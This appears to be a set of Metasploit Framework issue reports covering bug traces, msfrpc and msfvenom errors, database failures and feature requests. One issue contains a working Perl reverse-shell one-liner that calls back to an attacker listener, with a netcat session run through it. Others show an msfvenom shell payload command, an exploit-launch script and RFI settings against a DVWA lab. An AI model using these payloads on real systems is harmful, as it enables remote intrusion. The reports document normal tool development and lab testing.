%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

   =[ metasploit v4.4.0-dev [core:4.4 api:1.0]

-- --=[ 889 exploits - 516 auxiliary - 152 post
-- --=[ 251 payloads - 28 encoders - 8 nops

[*] Successfully loaded plugin: pro
msf > search jboss

Matching Modules

Name Disclosure Date Rank Description

auxiliary/admin/http/jboss_seam_exec 2010-07-19 normal JBoss Seam 2 Remote Command Execution
auxiliary/scanner/http/jboss_vulnscan normal JBoss Vulnerability Scanner
exploit/multi/http/jboss_bshdeployer 2010-04-26 excellent JBoss JMX Console Beanshell Deployer WAR Upload and Deployment
exploit/multi/http/jboss_deploymentfilerepository 2010-04-26 excellent JBoss Java Class DeploymentFileRepository WAR Deployment
exploit/multi/http/jboss_maindeployer 2007-02-20 excellent JBoss JMX Console Deployer Upload and Execute

msf > exit
[root@devel ~]#

Possible API bugs

Please see https://gist.github.com/0113c4951351b833bec8

I have commented it up as much as I could to provide context. Just playing around with the API, going through some standard workflows, I have found some methods do not behave as expected. There is still a chance the issue is on my end, but I have compared my code to examples and poured over the PDF documentation and can't find the issue.

Basically, the script takes a name, and a series of reports you want to import into MSF Pro. It creates a new project with the project name given, and proceeds to import, then start_exploit on the data imported.

Once this is done, it is supposed to generate a report. This works under special circumstances, explained in comments in the code.

Any thoughts? msfrpc-client is v1.0.1. MSF Pro 4.2.0 release.

Ruby version (just in case it matters):
ruby 1.9.2p290 (2011-07-09 revision 32553) [x86_64-linux]

Missing ) causes error on /handler/reverse_http.rb

https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/handler/reverse_http.rb#L96 should read
], Msf::Handler::ReverseHttps)
instead of
], Msf::Handler::ReverseHttps

missing ')' causes this error

XML Export provides details for all modules

Not sure if this is expected or not, but running a single db_nmap command and then running db_export provides an XML that's quite sizable, because all module information is included within.

msf > wc test.xml
[*] exec: wc test.xml
  52288  107342 1940709 test.xml

I expected only used modules would be including, and am having a hard time thinking of a use case in which all modules would need to be provided in an export scenario.

I'm linking the XML generated by this sequence of commands:

msf > db_connect blah:blah@localhost/blah
msf> db_nmap 10.0.0.1
msf> db_export test.xml

XML Sample can be found here: http://pub.pwnieexpress.com/msf_xml_issue_2012021801.xml

meterpreter "run" should tab-complete local exploits

Currently only completes post modules.

Reverse http and https broken

Recent updates to meterpreter have broken the sweet egress tunnels :(
Payloads hit the handler, no URI checksum is performed, a "session" opens far as msfconsole thinks but IRB framework.sessions does not show it. No libs loaded, nada - dummy session

built a binary, uploaded to a host, see results at http://pastie.org/4160498
injecting a live payload: http://pastie.org/4160393

HTTP is same as HTTPS so i'm pretty sure its at the payload as the handlers have not changed and HTTP means its not an SSL issue.

Tested against R7 trunk as of this morning

Update dev environment setup wiki to account for BackTrack

The BackTrack LiveCD environment defaults to the user always being UID 0, according to JonValt. This presents some problems for RVM.

Bug in Nmap.rb auxilliary file

A variable name is wrong in file lib/msf/core/auxiliary/nmap.rb

Line 227 : variable named "c" is used, but "badchar" should be more appropriated.

Reported by @thorgul

Diff : https://gist.github.com/4116970

DisablePayloadHandler option doesn't work over msfrpc

The DisablePayloadHandler option appears to be ignored when attempting to execute a module over msfrpc. The error the framework returns is: [03/23/2013 15:38:37] [e(0)] core: Exploit failed (multi/browser/java_jre17_jmxbean): A payload has not been selected.. Sample code below:

#!/usr/bin/python
# requires msgpack-python and pymetasploit from https://github.com/allfro/pymetasploit
from metasploit.msfrpc import MsfRpcClient

c = MsfRpcClient('test')

e = c.modules.use('exploit', 'multi/browser/java_jre17_jmxbean')
e['DisablePayloadHandler'] = True
e['EXE::Custom'] = '/opt/metasploit/tools/memdump/memdump.exe'
print 'Result of execution: %s' % e.execute()
print 'Current job list: %s' % c.jobs.list

msfvenom fails with NoMethodError undefined method `supports?' for [Msf::Module::Platform::Linux]:Array

The offending code is:

68 def init_platform(platform)
69 if(platform.supports?(::Msf::Module::PlatformList.win32))
70 datastore['AllowWin32SEH'] = true
71 end
72 end

The backtrace, with 'p platform.inspect' to show the data:

root@w00den-pickle:/tools/msf_readonly# ./msfvenom -p linux/x86/exec -e x86/alpha_mixed -f raw -b '\x00' PrependSetreuid=true CMD=/bin/bash
"[Msf::Module::Platform::Linux]"
[-] x86/alpha_mixed failed: NoMethodError undefined method supports?' for [Msf::Module::Platform::Linux]:Array /root/tools/msf_readonly/modules/encoders/x86/alpha_mixed.rb:70:ininit_platform'
/root/tools/msf_readonly/lib/msf/core/encoder.rb:227:in encode' ./msfvenom:355:inblock (2 levels) in

'
./msfvenom:353:in upto' ./msfvenom:353:inblock in '
./msfvenom:340:in each' ./msfvenom:340:in'
1�1�jFX̀j
X�Rfh-c��h/shh/bin��R
root@w00den-pickle:/tools/msf_readonly#

error with undefined Railgun Function in post/windows/gather/cachedump

Cachedump Module is returning this error

[-] Post failed: RuntimeError DLL-function NetGetJoinInformation not found. Known functions: ["NetGetJoinInformation(",
"NetUserDel",
"NetServerGetInfo",
"NetUserGetGroups",
"NetUserGetLocalGroups",
"NetUserEnum",
"NetServerEnum",
"NetApiBufferFree"]

[-] Call stack:
[-] /Users/carlos/Development/msf4/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb:78:in call_function' [-] /Users/carlos/Development/msf4/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb:23:inmethod_missing'
[-] /Users/carlos/Development/msf4/modules/post/windows/gather/cachedump.rb:465:in `run'

snmp_enum module throws 'Errno::EISCONN Socket is already connected'

Simple configuration of the snum_enum (running against a single host - 1 thread) module on OSX results in:

[*] Unknown error: Errno::EISCONN Socket is already connected - send(2)

No error is logged in framework.log

Error in post/windows/gather/credentials/filezilla_server when reporting credentials

FileZila Server Module error

[] Checking for Filezilla Server directory in: C:\Program Files\FileZilla Server
[] Found FileZilla Server

[] Collected the following credentials:
[] Username: testadmin
[] Password: 179ad45c6ce2cb97cf1029e212046e81
[] Group:

[-] Post failed: ArgumentError Invalid address or object for :host (#<Session:meterpreter 192.168.1.154:49380 "windev01\carlos @ WINDEV01">)
[-] Call stack:
[-] /Users/carlos/Development/msf4/lib/msf/core/db.rb:963:in report_auth_info' [-] /Users/carlos/Development/msf4/lib/msf/core/auxiliary/report.rb:93:inreport_auth_info'
[-] /Users/carlos/Development/msf4/modules/post/windows/gather/credentials/filezilla_server.rb:163:in block in get_filezilla_creds' [-] /Users/carlos/Development/msf4/modules/post/windows/gather/credentials/filezilla_server.rb:148:ineach'
[-] /Users/carlos/Development/msf4/modules/post/windows/gather/credentials/filezilla_server.rb:148:in get_filezilla_creds' [-] /Users/carlos/Development/msf4/modules/post/windows/gather/credentials/filezilla_server.rb:54:inrun'
[*] Post module execution completed

PG::Error: ERROR: relation "cred_files" does not exist - when removing a workspace with "workspace -d"

Postgres backend, connected to database using valid creds. repros on both a newly created database, and a database with information (including credentials) in it.

msf > db_connect user:pass@localhost/msfx
NOTICE:  CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE:  CREATE TABLE will create implicit sequence "clients_id_seq" for serial column "clients.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for table "clients"
NOTICE:  CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "services_pkey" for table "services"
NOTICE:  CREATE TABLE will create implicit sequence "vulns_id_seq" for serial column "vulns.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vulns_pkey" for table "vulns"
NOTICE:  CREATE TABLE will create implicit sequence "refs_id_seq" for serial column "refs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "refs_pkey" for table "refs"
NOTICE:  CREATE TABLE will create implicit sequence "notes_id_seq" for serial column "notes.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "notes_pkey" for table "notes"
NOTICE:  CREATE TABLE will create implicit sequence "wmap_targets_id_seq" for serial column "wmap_targets.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "wmap_targets_pkey" for table "wmap_targets"
NOTICE:  CREATE TABLE will create implicit sequence "wmap_requests_id_seq" for serial column "wmap_requests.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "wmap_requests_pkey" for table "wmap_requests"
NOTICE:  CREATE TABLE will create implicit sequence "workspaces_id_seq" for serial column "workspaces.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "workspaces_pkey" for table "workspaces"
NOTICE:  CREATE TABLE will create implicit sequence "events_id_seq" for serial column "events.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "events_pkey" for table "events"
NOTICE:  CREATE TABLE will create implicit sequence "loots_id_seq" for serial column "loots.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "loots_pkey" for table "loots"
NOTICE:  CREATE TABLE will create implicit sequence "users_id_seq" for serial column "users.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "users_pkey" for table "users"
NOTICE:  CREATE TABLE will create implicit sequence "reports_id_seq" for serial column "reports.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "reports_pkey" for table "reports"
NOTICE:  CREATE TABLE will create implicit sequence "tasks_id_seq" for serial column "tasks.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "tasks_pkey" for table "tasks"
NOTICE:  CREATE TABLE will create implicit sequence "creds_id_seq" for serial column "creds.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "creds_pkey" for table "creds"
NOTICE:  CREATE TABLE will create implicit sequence "exploited_hosts_id_seq" for serial column "exploited_hosts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "exploited_hosts_pkey" for table "exploited_hosts"
NOTICE:  CREATE TABLE will create implicit sequence "report_templates_id_seq" for serial column "report_templates.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "report_templates_pkey" for table "report_templates"
NOTICE:  CREATE TABLE will create implicit sequence "campaigns_id_seq" for serial column "campaigns.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "campaigns_pkey" for table "campaigns"
NOTICE:  CREATE TABLE will create implicit sequence "email_templates_id_seq" for serial column "email_templates.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "email_templates_pkey" for table "email_templates"
NOTICE:  CREATE TABLE will create implicit sequence "attachments_id_seq" for serial column "attachments.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "attachments_pkey" for table "attachments"
NOTICE:  CREATE TABLE will create implicit sequence "email_addresses_id_seq" for serial column "email_addresses.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "email_addresses_pkey" for table "email_addresses"
NOTICE:  CREATE TABLE will create implicit sequence "web_templates_id_seq" for serial column "web_templates.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_templates_pkey" for table "web_templates"
NOTICE:  CREATE TABLE will create implicit sequence "web_sites_id_seq" for serial column "web_sites.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_sites_pkey" for table "web_sites"
NOTICE:  CREATE TABLE will create implicit sequence "web_pages_id_seq" for serial column "web_pages.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_pages_pkey" for table "web_pages"
NOTICE:  CREATE TABLE will create implicit sequence "web_forms_id_seq" for serial column "web_forms.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_forms_pkey" for table "web_forms"
NOTICE:  CREATE TABLE will create implicit sequence "web_vulns_id_seq" for serial column "web_vulns.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_vulns_pkey" for table "web_vulns"
NOTICE:  CREATE TABLE will create implicit sequence "imported_creds_id_seq" for serial column "imported_creds.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "imported_creds_pkey" for table "imported_creds"
NOTICE:  CREATE TABLE will create implicit sequence "tags_id_seq" for serial column "tags.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "tags_pkey" for table "tags"
NOTICE:  CREATE TABLE will create implicit sequence "sessions_id_seq" for serial column "sessions.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "sessions_pkey" for table "sessions"
NOTICE:  CREATE TABLE will create implicit sequence "session_events_id_seq" for serial column "session_events.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "session_events_pkey" for table "session_events"
NOTICE:  CREATE TABLE will create implicit sequence "routes_id_seq" for serial column "routes.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "routes_pkey" for table "routes"
NOTICE:  CREATE TABLE will create implicit sequence "api_keys_id_seq" for serial column "api_keys.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "api_keys_pkey" for table "api_keys"
NOTICE:  CREATE TABLE will create implicit sequence "macros_id_seq" for serial column "macros.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "macros_pkey" for table "macros"
NOTICE:  CREATE TABLE will create implicit sequence "listeners_id_seq" for serial column "listeners.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "listeners_pkey" for table "listeners"
NOTICE:  CREATE TABLE will create implicit sequence "nexpose_consoles_id_seq" for serial column "nexpose_consoles.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "nexpose_consoles_pkey" for table "nexpose_consoles"
NOTICE:  CREATE TABLE will create implicit sequence "profiles_id_seq" for serial column "profiles.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "profiles_pkey" for table "profiles"
NOTICE:  CREATE TABLE will create implicit sequence "mod_refs_id_seq" for serial column "mod_refs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "mod_refs_pkey" for table "mod_refs"
NOTICE:  CREATE TABLE will create implicit sequence "vuln_details_id_seq" for serial column "vuln_details.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vuln_details_pkey" for table "vuln_details"
NOTICE:  CREATE TABLE will create implicit sequence "host_details_id_seq" for serial column "host_details.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "host_details_pkey" for table "host_details"
NOTICE:  CREATE TABLE will create implicit sequence "vuln_attempts_id_seq" for serial column "vuln_attempts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vuln_attempts_pkey" for table "vuln_attempts"
NOTICE:  CREATE TABLE will create implicit sequence "module_details_id_seq" for serial column "module_details.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_details_pkey" for table "module_details"
NOTICE:  CREATE TABLE will create implicit sequence "module_authors_id_seq" for serial column "module_authors.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_authors_pkey" for table "module_authors"
NOTICE:  CREATE TABLE will create implicit sequence "module_mixins_id_seq" for serial column "module_mixins.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_mixins_pkey" for table "module_mixins"
NOTICE:  CREATE TABLE will create implicit sequence "module_targets_id_seq" for serial column "module_targets.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_targets_pkey" for table "module_targets"
NOTICE:  CREATE TABLE will create implicit sequence "module_actions_id_seq" for serial column "module_actions.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_actions_pkey" for table "module_actions"
NOTICE:  CREATE TABLE will create implicit sequence "module_refs_id_seq" for serial column "module_refs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_refs_pkey" for table "module_refs"
NOTICE:  CREATE TABLE will create implicit sequence "module_archs_id_seq" for serial column "module_archs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_archs_pkey" for table "module_archs"
NOTICE:  CREATE TABLE will create implicit sequence "module_platforms_id_seq" for serial column "module_platforms.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_platforms_pkey" for table "module_platforms"
NOTICE:  CREATE TABLE will create implicit sequence "exploit_attempts_id_seq" for serial column "exploit_attempts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "exploit_attempts_pkey" for table "exploit_attempts"
[*] Rebuilding the module cache in the background...
msf > workspace -a test_workspace
[*] Added workspace: test_workspace
msf > workspace test_workspace
[*] Workspace: test_workspace
msf > workspace -d test_workspace
[-] Error while running command workspace: PG::Error: ERROR:  relation "cred_files" does not exist
LINE 4:              WHERE a.attrelid = '"cred_files"'::regclass
                                        ^
:             SELECT a.attname, format_type(a.atttypid, a.atttypmod), d.adsrc, a.attnotnull
              FROM pg_attribute a LEFT JOIN pg_attrdef d
                ON a.attrelid = d.adrelid AND a.attnum = d.adnum
             WHERE a.attrelid = '"cred_files"'::regclass
               AND a.attnum > 0 AND NOT a.attisdropped
             ORDER BY a.attnum


Call stack:
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/postgresql_adapter.rb:1158:in `async_exec'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/postgresql_adapter.rb:1158:in `exec_no_cache'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/postgresql_adapter.rb:664:in `block in exec_query'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/abstract_adapter.rb:280:in `block in log'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support/notifications/instrumenter.rb:20:in `instrument'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/abstract_adapter.rb:275:in `log'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/postgresql_adapter.rb:663:in `exec_query'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/postgresql_adapter.rb:1283:in `column_definitions'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/postgresql_adapter.rb:859:in `columns'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/schema_cache.rb:12:in `block in initialize'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/model_schema.rb:228:in `yield'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/model_schema.rb:228:in `default'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/model_schema.rb:228:in `columns'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/model_schema.rb:237:in `columns_hash'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/locking/optimistic.rb:129:in `locking_enabled?'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/relation.rb:170:in `exec_queries'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/relation.rb:160:in `block in to_a'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/explain.rb:25:in `logging_query_plan'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/relation.rb:159:in `to_a'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/relation/finder_methods.rb:159:in `all'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/associations/collection_association.rb:380:in `find_target'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/associations/collection_association.rb:333:in `load_target'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/associations/collection_proxy.rb:44:in `load_target'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/associations/collection_proxy.rb:87:in `method_missing'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/associations/builder/has_many.rb:32:in `block in define_destroy_dependency_method'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support/callbacks.rb:407:in `_run__3732377711620605996__destroy__820861483667306654__callbacks'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support/callbacks.rb:405:in `__run_callback'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support/callbacks.rb:385:in `_run_destroy_callbacks'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support/callbacks.rb:81:in `run_callbacks'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/callbacks.rb:254:in `destroy'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:236:in `block in destroy'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:295:in `block in with_transaction_returning_status'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/abstract/database_statements.rb:192:in `transaction'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:208:in `transaction'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:293:in `with_transaction_returning_status'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:236:in `destroy'
/opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/db.rb:140:in `block (2 levels) in cmd_workspace'
/opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/db.rb:125:in `each'
/opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/db.rb:125:in `block in cmd_workspace'
/opt/metasploit/msf3/lib/msf/core/patches/active_record.rb:22:in `with_connection'
/opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/db.rb:96:in `cmd_workspace'
/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:200:in `run'
./msfconsole:148:in `<main>'
msf >

Payload cmd/unix/reverse_perl suggestion

Suggested "improvement" to cmd/unix/reverse_perl.rb

Change payload from
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,"#{lhost}:#{datastore['LPORT']}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"

to
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,"#{lhost}:#{datastore['LPORT']}");$~->fdopen($c,w);STDERR->fdopen($c,w);print $c "$ ";while(<$c>) { print $c qx($_)."$ ";}'

This allows for a prompt to be displayed and captures both stderr and stdout.

Example:
root@bt:~# nc -lvvvp 999
listening on [any] 999 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 60413
$ ls
aix
bsdi
dialup
freebsd
hpux
irix
linux
multi
netware
osx
solaris
unix
windows
$ ps 9890-asdasd
ERROR: Process ID list syntax error.
********* simple selection ********* ********* selection by list *********
-A all processes -C by command name
-N negate selection -G by real group ID (supports names)
-a all w/ tty except session leaders -U by real user ID (supports names)
-d all except session leaders -g by session OR by effective group name
-e all processes -p by process ID
T all processes on this terminal -s processes in the sessions given
a all w/ tty, including other users -t by tty
g OBSOLETE -- DO NOT USE -u by effective user ID (supports names)
r only running processes U processes for specified users
x processes w/o controlling ttys t by tty
*********** output format ********** *********** long options ***********
-o,o user-defined -f full --Group --User --pid --cols --ppid
-j,j job control s signal --group --user --sid --rows --info
-O,O preloaded -o v virtual memory --cumulative --format --deselect
-l,l long u user-oriented --sort --tty --forest --version
-F extra full X registers --heading --no-heading --context
********* misc options *********
-V,V show version L list format codes f ASCII art forest
-m,m,-L,-T,H threads S children in sum -y change -l format
-M,Z security data c true command name -c scheduling class
-w,w wide output n numeric WCHAN,UID -H process hierarchy
$ nosuchcommand generates no output
$

Hope you liek teh milk!

msfupdate troubles

running ./msfupdate or svn update, the commands executed properly but when near completion an error stating something to do with (" https can not be truncated (http://www.metasploit.com)").
the 3rd try using ./msfupdate it stuck at (" A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.2
A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.2/lib
A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.2/lib/sprockets
A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.2/lib/sprockets/cache
A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.3
A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.3/LICENSE
A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.3/lib
A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.3/lib/sprockets.rb
A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.3/lib/sprockets" )

someone pliz help

Meterpreter reads IP as netmask

ipconfig returns
...
IPv4 Address : 192.168.1.4
IPv4 Netmask : 192.168.1.4
...

client.net.config.interfaces[idx] returns
...
@addrs=["", "192.168.1.4"], @netmasks=["", "192.168.1.4"]
...

something is amiss here.

Feature Request: Webserver (SRVHOST) logging

Having complete logs of requests that come in via Metasploit webserver would be very useful to diagnose problems live.

method `normalize_uri'

Hello all!

I am using msfconsole to exploit a vulnerable VM with an outdated Apache server running on it. I am trying to use the (auxiliary/dos/http/apache_range_dos) module.

I keep getting this error:

Auxiliary failed: NoMethodError undefined method `normalize_uri' for #<Msf::Modules::Mod617578696c696172792f646f732f687474702f6170616368655f72616e67 655f646f73::Metasploit3:0xd9ab278>

[-] Call stack:

[-] /opt/metasploit/msf3/modules/auxiliary/dos/http/apache_range_dos.rb:48:in `run'

[*] Auxiliary module execution completed

I can't find this anywhere and I have no idea what is causing it. I can ping the host just fine from the BackTrack5R3 VM and the local host. I have ran msfupdate also.

Any help would be greatly appreciated.

DNSSEC issues auxiliary/gather/enum_dns

[-] Auxiliary failed: NameError uninitialized constant Net::DNS::RR::RRSIG
[-] Call stack:
[-]   lib/net/dns/rr.rb:325:in `eval'
[-]   lib/net/dns/rr.rb:325:in `eval'
[-]   lib/net/dns/rr.rb:325:in `new_from_binary'
[-]   lib/net/dns/rr.rb:175:in `parse_packet'
[-]   lib/net/dns/packet.rb:521:in `block in new_from_data'
[-]   lib/net/dns/packet.rb:520:in `times'
[-]   lib/net/dns/packet.rb:520:in `new_from_data'
[-]   lib/net/dns/packet.rb:152:in `parse'
[-]   lib/net/dns/resolver.rb:979:in `send'
[-]   lib/net/dns/resolver.rb:890:in `query'
[-]   modules/auxiliary/gather/enum_dns.rb:368:in `block in axfr'
[-]   modules/auxiliary/gather/enum_dns.rb:360:in `each'
[-]   modules/auxiliary/gather/enum_dns.rb:360:in `axfr'
[-]   modules/auxiliary/gather/enum_dns.rb:503:in `run'

question about PHP Meterpreter

I am using http://www.offensive-security.com/metasploit-unleashed/PHP_Meterpreter this module
doing the test on DVWA http://www.dvwa.co.uk/ this test VM which has a LFI test enviroment。
this is the basic config:

sf exploit(php_include) > show options

Module options (exploit/unix/webapp/php_include):


Name Current Setting Required Description

PATH / yes The base directory to prepend to the URL to try

PHPRFIDB /opt/metasploit/msf3/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL

PHPURI /dvwa/vulnerabilities/fi/?page=XXpathXX no The URI to request, with the include parameter changed to XXpathXX

POSTDATA no The POST data to send, with the include parameter changed to XXpathXX

Proxies no Use a proxy chain

RHOST 192.168.245.130 yes The target address

RPORT 80 yes The target port

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT 8080 yes The local port to listen on.

SSLCert no Path to a custom SSL certificate (default is randomly generated)

